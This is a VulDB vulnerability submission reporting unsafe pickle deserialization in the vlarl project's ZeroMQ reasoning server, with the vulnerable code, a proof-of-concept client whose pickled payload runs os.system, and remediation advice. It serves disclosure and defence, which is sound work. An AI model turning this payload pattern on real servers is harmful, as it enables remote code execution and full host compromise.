提交 #653279: vlarl latest Insecure Deserialization(leads to Remote Code Execution)信息

标题	vlarl latest Insecure Deserialization(leads to Remote Code Execution)
描述	# Security Report: Remote Code Execution Vulnerability in `experiments.robot.bridge.reasoning_server::run_reasoning_server` ### Summary A critical Remote Code Execution (RCE) vulnerability exists in `experiments.robot.bridge.reasoning_server::run_reasoning_server`. The server accepts incoming messages and deserializes them using `pickle.loads`, which allows attackers to execute arbitrary code on the host system. ### Details The vulnerable code is located at:[experiments.robot.bridge.reasoning_server::run_reasoning_server]( https://github.com/GuanxingLu/vlarl/blob/main/experiments/robot/bridge/reasoning_server.py#L64-L86) The server listens for incoming messages via ZeroMQ (`zmq`). Received data is deserialized using `pickle.loads(message)`: ```python while True: message = socket.recv() inputs = pickle.loads(message) # Unsafe deserialization result = model.raw_generate(inputs) socket.send(pickle.dumps(result)) ``` `pickle` is inherently unsafe for untrusted data. Attackers can craft malicious payloads that execute arbitrary code during deserialization. ### Proof of Concept (PoC) 1. Start the vulnerable server: ```shell PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py ``` 2. Run the following client code to send a malicious payload: ```python import pickle, zmq class Payload(object): def __reduce__(self): import os return (os.system, ('echo "hacked"',)) context = zmq.Context() socket = context.socket(zmq.REQ) socket.connect("tcp://127.0.0.1:5623") socket.send(pickle.dumps(Payload())) ``` 3. The server will execute `os.system('echo "hacked"')`, demonstrating remote code execution. ### Impact - Attackers can remotely execute arbitrary system commands, leading to full server compromise. - This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure. ### Recommendation - Never use `pickle.loads` on data from untrusted sources.* - Replace `pickle` with a safe serialization format such as JSON or MessagePack, and strictly validate all inputs. ### References - [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns) - [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
来源	⚠️ https://github.com/GuanxingLu/vlarl/issues/18
用户	zznQ (UID 64000)
提交	2025-09-12 07時58分 (7 月前)
管理	2025-09-25 16時12分 (13 days later)
状态	已接受
VulDB条目	325846 [GuanxingLu vlarl 直到 31abc0baf53ef8f5db666a1c882e1ea64def2997 ZeroMQ reasoning_server.py run_reasoning_server 信息权限提升]
积分	20

◂ 上一步一览下一步 ▸

Interested in the pricing of exploits?

See the underground prices here!